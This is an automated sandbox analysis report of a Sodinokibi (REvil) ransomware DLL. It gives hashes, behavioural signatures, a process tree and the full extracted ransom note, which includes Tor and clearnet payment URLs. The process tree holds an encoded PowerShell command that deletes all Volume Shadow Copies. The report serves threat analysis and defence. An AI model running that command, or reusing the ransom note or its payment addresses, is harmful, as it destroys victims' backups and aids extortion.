Overview

overview

10

Static

static

10

Bazaar.2020.02.7z

windows7-x64

3

Bazaar.2020.02.7z

windows10-2004-x64

3

bazaar.202...in.dll

windows7-x64

3

bazaar.202...in.dll

windows10-2004-x64

10

bazaar.202...in.dll

windows7-x64

10

bazaar.202...in.dll

windows10-2004-x64

10

bazaar.202...in.dll

windows7-x64

10

bazaar.202...in.dll

windows10-2004-x64

10

Resubmissions

15-09-2024 22:00

240915-1wpj7svapc 10

15-09-2024 21:56

240915-1tbwbsthne 10

20-08-2024 13:49

240820-q4v2vayfmp 10

Analysis

  • max time kernel
    93s
  • max time network
    136s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-09-2024 22:00

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bazaar.2020.02/HEUR-Trojan-Ransom.Win32.Sodin.dll

  • Size

    166KB

  • MD5

    9e9b0ef4fc739c3eb36a762122451992

  • SHA1

    035fe67a3d04f0a678724851cabc917b28416fe1

  • SHA256

    0ee7783213426a5e46bc11a91acf5f2d73890bb09bbf4f3b932a4b79eeb6b820

  • SHA512

    01435694c0941b004584d40c3d11866e8f319445ed937095d9777911bd6f36c6bd9449b4effa369120cf6ded9de9a375719e256c6f8380bd5fbd4f4ca0c6d715

  • SSDEEP

    3072:JLFrb30BRtBZZg+i2ayyYOCWGPyLydrkxMT3Q7FTivJ:NJ0BXScFyfC3Hd4yg7Fu

Score
10/10
sodinokibidiscoveryransomware

Malware Config

Extracted

Path

C:\Recovery\xjuzlk-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension xjuzlk. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3F92B6C75476B614 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/3F92B6C75476B614 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: GLw0DjjRiu5U65wM7SzzaNX8lNNkMYDZ/Z1kw7uZf7x7z6pjpf35nm3jg4QJDChO E44Ze7ADCorXckUeZ7CK/Mj8GboowPvGGM3uOZtzhOH37mbnaXMYIjh6IGAFXQpj ZiIS7OSJ64Cijum2CS/Yc71GxR5cSrFRRapAv6lz8vwQ0qkhvMWIdi/xnGSqBcco cvc7IlAG7Ocu+ZM108aDFsiXK7MSR0xrH5DMRthfTI+H1kGhiaoQ/uPMeW/F+2Av nbC5zwMkBhrq/lbOc2YZ15y89KK9LyrD2AKGi+uN5F9ImgwW7qH0tYaQZN/ozn8s v4J+XdDReo/2LkPeRsV0H6iI9OkI4FOdISPnSUEXqUEojX+EtolE+wKOaTQakJUW 6/POC2dnaSlNQse/TvA74wXL4dNFasHREnxbsUy5+bViCd0hCbOmvXUumXrs+NXq s6miXhXc6wuzb75zfKd5D32mNmnd9/0LRwzV3l8QKfaMVDAKOkfnZLcUee9crsRc Ke1R8CCMD8rFzUBabEBSg8FLE3pAH5aXgjqpj/IeQEBrrhGku8/Bbo42BzQWypd4 fkLjJm9ScNV77658y+hAiwvf3MnWtsY8lNN0PjQoux3SRaImLG1AQoTUX6YuxrxF vVH+btcoOYw4zGruoVYcLZ/qKmQDpvQfOkoEnhtUnEGU5DpFaqSRmk2Q4okpkBXf Bo/44qPmHRWZ5BiVvXgmHGnR2r2R4CXjnYdIzC0mIP1QgbleuXvqKvA/BWwECfSj oFJRYYq8NsOf2PXSiDaz3yhA1LZnl/RY9OKkb7plZ0IbN2JF/KoDOI4c7nv/N0yC VWJhluL88qEZ2ISYOJQc2DjsRVYIUdN3nGQ/q/hP/SpILwd0yx5NjuesBtWnkzWu xQmdVDcQ4mIiwG4v7vX8gPYh5BSVGHHVSK4OF7yMKusUNXBG9OXYcGLbVmwV60Y6 CUN+Hio2ZzbCoktmGRWox+DXSsIswsKPbedhBmphgw73Y/bbb+MW3sun4A4gpsAW YEDqXGQytzFIKpoN76nKb1pVzxQR9UkzHiOBTxqthWy8MpiL8Ny0y9fgwFzKMTtX howB/VwXQxxG3EVdyd/oQ+g88wLo9i6hM2qZWgSL2lHHV/IHfCCsyEvPzOkKZSEx rvkhzeN+y0VZIq5tpitVw5MuOfLwjxGj0+Nem0DWcbTfUkDcJIeRCFhZjcg58orj 952RsLo8heTWAVnX/Eyq0QbalDj3ZoCNzZohsYQs582CL+O13lfiuDMcN25RHAT5 DYavxkKfpxJa2QuGGWvyxI+MlyPXHXP8bE1b8aMzB5TWoQiINf7mpNC6sMOzlBVH jiQ1Q7NxaYXhP5I/ZJ8iqQgeAC7ZlCt3FaugSAze5uc8s0aRvhQ= Extension name: xjuzlk -------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!! A system of morality which is based on relative emotional values is a mere illusion, a thoroughly vulgar conception which has nothing sound in it and nothing true. Socrates
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3F92B6C75476B614

http://decryptor.cc/3F92B6C75476B614

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 41 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\bazaar.2020.02\HEUR-Trojan-Ransom.Win32.Sodin.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:468
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\bazaar.2020.02\HEUR-Trojan-Ransom.Win32.Sodin.dll,#1
      2⤵
      • Enumerates connected drives
      • Drops file in Program Files directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4856
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2192
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:1304
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3000

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Recovery\xjuzlk-readme.txt
      Filesize

      7KB

      MD5

      5e83ce6dfcadf262311023d2f71398d1

      SHA1

      06069c405bf209aba3d3b02a388b5530de13e069

      SHA256

      a6d7248796bbdb0d77774db536b54b96e034df66f70bfb355d77fb0e47a6a01c

      SHA512

      468cc0312ec0dea6553e325e172ab1a0e770682e9ed5bbc3f615de4577f52b5e96be56827b63e3e623e92010b5cf21ec498b0c9a3540c45870db618991e12501

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nctmjsqr.qeq.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/2192-0-0x00007FFF42233000-0x00007FFF42235000-memory.dmp

      Filesize

      8KB

      Download

    • memory/2192-1-0x0000024DA29C0000-0x0000024DA29E2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/2192-11-0x00007FFF42230000-0x00007FFF42CF1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2192-12-0x00007FFF42230000-0x00007FFF42CF1000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/2192-15-0x00007FFF42230000-0x00007FFF42CF1000-memory.dmp

      Filesize

      10.8MB

      Download